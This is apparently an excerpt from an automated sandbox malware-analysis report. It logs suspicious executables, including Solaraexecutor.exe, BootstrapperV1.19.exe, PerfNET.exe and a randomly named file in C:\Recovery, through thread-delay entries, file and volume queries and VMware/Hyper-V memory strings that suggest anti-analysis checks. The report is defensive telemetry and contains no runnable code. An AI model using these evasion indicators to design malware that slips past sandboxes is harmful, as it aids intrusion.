Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe TID: 9120	Thread sleep time: -582654s >= -30000s
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe TID: 9120	Thread sleep time: -582532s >= -30000s
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe TID: 9120	Thread sleep time: -582375s >= -30000s
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe TID: 9120	Thread sleep time: -582238s >= -30000s
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe TID: 9120	Thread sleep time: -582094s >= -30000s
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe TID: 9120	Thread sleep time: -581971s >= -30000s
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe TID: 9120	Thread sleep time: -581831s >= -30000s
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe TID: 9120	Thread sleep time: -581704s >= -30000s
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe TID: 9120	Thread sleep time: -581578s >= -30000s
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe TID: 9120	Thread sleep time: -581425s >= -30000s
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe TID: 9120	Thread sleep time: -581297s >= -30000s
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe TID: 9120	Thread sleep time: -581113s >= -30000s
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe TID: 9120	Thread sleep time: -580579s >= -30000s
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe TID: 9120	Thread sleep time: -580374s >= -30000s
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe TID: 9120	Thread sleep time: -580266s >= -30000s
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe TID: 9120	Thread sleep time: -580154s >= -30000s
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe TID: 9120	Thread sleep time: -580039s >= -30000s
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe TID: 9120	Thread sleep time: -579875s >= -30000s
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe TID: 9120	Thread sleep time: -579719s >= -30000s
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe TID: 9120	Thread sleep time: -579485s >= -30000s
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe TID: 9120	Thread sleep time: -579345s >= -30000s
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe TID: 9120	Thread sleep time: -579204s >= -30000s
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe TID: 9120	Thread sleep time: -579094s >= -30000s
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe TID: 9120	Thread sleep time: -578969s >= -30000s
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe TID: 9120	Thread sleep time: -578840s >= -30000s

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Last function: Thread delayed
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Last function: Thread delayed
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Last function: Thread delayed
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	File Volume queried: C:\ FullSizeInformation

Source: C:\Users\user\AppData\Local\Temp\Solaraexecutor.exe	Code function: 3_2_00D2A69B FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,		3_2_00D2A69B
Source: C:\Users\user\AppData\Local\Temp\Solaraexecutor.exe	Code function: 3_2_00D3C220 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,		3_2_00D3C220

Source: C:\Users\user\AppData\Local\Temp\Solaraexecutor.exe

Code function: 3_2_00D3E6A3 VirtualQuery,GetSystemInfo,

3_2_00D3E6A3

Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exe	Thread delayed: delay time: 599890	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exe	Thread delayed: delay time: 599780	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exe	Thread delayed: delay time: 599671	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exe	Thread delayed: delay time: 599562	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exe	Thread delayed: delay time: 599453	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exe	Thread delayed: delay time: 599343	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exe	Thread delayed: delay time: 599234	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exe	Thread delayed: delay time: 599125	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exe	Thread delayed: delay time: 599015	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exe	Thread delayed: delay time: 598906	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exe	Thread delayed: delay time: 598796	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exe	Thread delayed: delay time: 598686	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exe	Thread delayed: delay time: 598578	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exe	Thread delayed: delay time: 598468	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exe	Thread delayed: delay time: 598233	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exe	Thread delayed: delay time: 598125	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exe	Thread delayed: delay time: 598015	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exe	Thread delayed: delay time: 597906	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exe	Thread delayed: delay time: 597796	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exe	Thread delayed: delay time: 597687	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exe	Thread delayed: delay time: 597578	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exe	Thread delayed: delay time: 597468	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exe	Thread delayed: delay time: 597359	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exe	Thread delayed: delay time: 597249	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exe	Thread delayed: delay time: 597140	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exe	Thread delayed: delay time: 597031	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exe	Thread delayed: delay time: 596921	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exe	Thread delayed: delay time: 596812	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exe	Thread delayed: delay time: 596703	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exe	Thread delayed: delay time: 596593	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exe	Thread delayed: delay time: 596484	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exe	Thread delayed: delay time: 596375	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exe	Thread delayed: delay time: 596265	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exe	Thread delayed: delay time: 596156	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exe	Thread delayed: delay time: 596046	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exe	Thread delayed: delay time: 595929	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exe	Thread delayed: delay time: 595780	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exe	Thread delayed: delay time: 595671	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exe	Thread delayed: delay time: 595562	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exe	Thread delayed: delay time: 595453	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exe	Thread delayed: delay time: 595343	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exe	Thread delayed: delay time: 595234	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exe	Thread delayed: delay time: 595125	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exe	Thread delayed: delay time: 595015	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exe	Thread delayed: delay time: 594906	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exe	Thread delayed: delay time: 594796	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exe	Thread delayed: delay time: 594687	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exe	Thread delayed: delay time: 594578	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exe	Thread delayed: delay time: 594468	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe	Thread delayed: delay time: 922337203685477
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	Thread delayed: delay time: 922337203685477
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	Thread delayed: delay time: 922337203685477
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	Thread delayed: delay time: 30000
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	Thread delayed: delay time: 922337203685477
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	Thread delayed: delay time: 600000
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	Thread delayed: delay time: 599860
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	Thread delayed: delay time: 599454
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	Thread delayed: delay time: 598797
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	Thread delayed: delay time: 598516
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	Thread delayed: delay time: 597922
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	Thread delayed: delay time: 597547
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	Thread delayed: delay time: 3600000
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	Thread delayed: delay time: 597047
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	Thread delayed: delay time: 596547
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	Thread delayed: delay time: 596157
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	Thread delayed: delay time: 595532
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	Thread delayed: delay time: 595329
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	Thread delayed: delay time: 594954
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	Thread delayed: delay time: 594709
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	Thread delayed: delay time: 594547
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	Thread delayed: delay time: 594110
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	Thread delayed: delay time: 593735
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	Thread delayed: delay time: 593464
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	Thread delayed: delay time: 592922
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	Thread delayed: delay time: 592657
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	Thread delayed: delay time: 592344
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	Thread delayed: delay time: 591969
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	Thread delayed: delay time: 591625
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	Thread delayed: delay time: 591172
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	Thread delayed: delay time: 590547
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	Thread delayed: delay time: 300000
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	Thread delayed: delay time: 590276
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	Thread delayed: delay time: 590016
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	Thread delayed: delay time: 589625
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	Thread delayed: delay time: 589219
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	Thread delayed: delay time: 588766
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	Thread delayed: delay time: 588406
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	Thread delayed: delay time: 587860
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	Thread delayed: delay time: 587516
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	Thread delayed: delay time: 586985
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	Thread delayed: delay time: 586594
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	Thread delayed: delay time: 586047
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	Thread delayed: delay time: 585657
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	Thread delayed: delay time: 584922
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	Thread delayed: delay time: 584438
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	Thread delayed: delay time: 584256
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	Thread delayed: delay time: 584089
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	Thread delayed: delay time: 583958
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	Thread delayed: delay time: 583822
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	Thread delayed: delay time: 583699
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	Thread delayed: delay time: 583554
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	Thread delayed: delay time: 583393
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	Thread delayed: delay time: 583250
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	Thread delayed: delay time: 583125
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	Thread delayed: delay time: 582995
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	Thread delayed: delay time: 582868
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	Thread delayed: delay time: 582764
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	Thread delayed: delay time: 582654
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	Thread delayed: delay time: 582532
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	Thread delayed: delay time: 582375
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	Thread delayed: delay time: 582238
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	Thread delayed: delay time: 582094
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	Thread delayed: delay time: 581971
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	Thread delayed: delay time: 581831
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	Thread delayed: delay time: 581704
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	Thread delayed: delay time: 581578
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	Thread delayed: delay time: 581425
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	Thread delayed: delay time: 581297
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	Thread delayed: delay time: 581113
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	Thread delayed: delay time: 580579
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	Thread delayed: delay time: 580374
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	Thread delayed: delay time: 580266
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	Thread delayed: delay time: 580154
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	Thread delayed: delay time: 580039
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	Thread delayed: delay time: 579875
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	Thread delayed: delay time: 579719
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	Thread delayed: delay time: 579485
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	Thread delayed: delay time: 579345
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	Thread delayed: delay time: 579204
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	Thread delayed: delay time: 579094
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	Thread delayed: delay time: 578969
Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe	Thread delayed: delay time: 578840

Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe	File opened: C:\Users\user\Documents\desktop.ini	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe	File opened: C:\Users\user\AppData\Local\Temp	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe	File opened: C:\Users\user\Desktop\desktop.ini	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe	File opened: C:\Users\user\AppData\Local	Jump to behavior

Source: Amcache.hve.7.dr	Binary or memory string: VMware
Source: Amcache.hve.7.dr	Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.7.dr	Binary or memory string: VMware, Inc.
Source: Amcache.hve.7.dr	Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.7.dr	Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: PerfNET.exe, 0000000D.00000002.2472010093.000000001C3D7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}itProp
Source: Amcache.hve.7.dr	Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.7.dr	Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: BootstrapperV1.19.exe, 00000001.00000002.1951428944.00000158ACA52000.00000004.00000020.00020000.00000000.sdmp, w32tm.exe, 0000004F.00000002.2255620960.000001F31E788000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: Amcache.hve.7.dr	Binary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
Source: Solaraexecutor.exe, 00000003.00000002.1710787237.0000000000C91000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\y
Source: Amcache.hve.7.dr	Binary or memory string: vmci.syshbin`
Source: Amcache.hve.7.dr	Binary or memory string: \driver\vmci,\driver\pci
Source: Amcache.hve.7.dr	Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.7.dr	Binary or memory string: VMware20,1
Source: Amcache.hve.7.dr	Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.7.dr	Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.7.dr	Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.7.dr	Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.7.dr	Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.7.dr	Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Solaraexecutor.exe, 00000003.00000003.1702174965.0000000000C91000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}y
Source: Amcache.hve.7.dr	Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.7.dr	Binary or memory string: VMware Virtual RAM
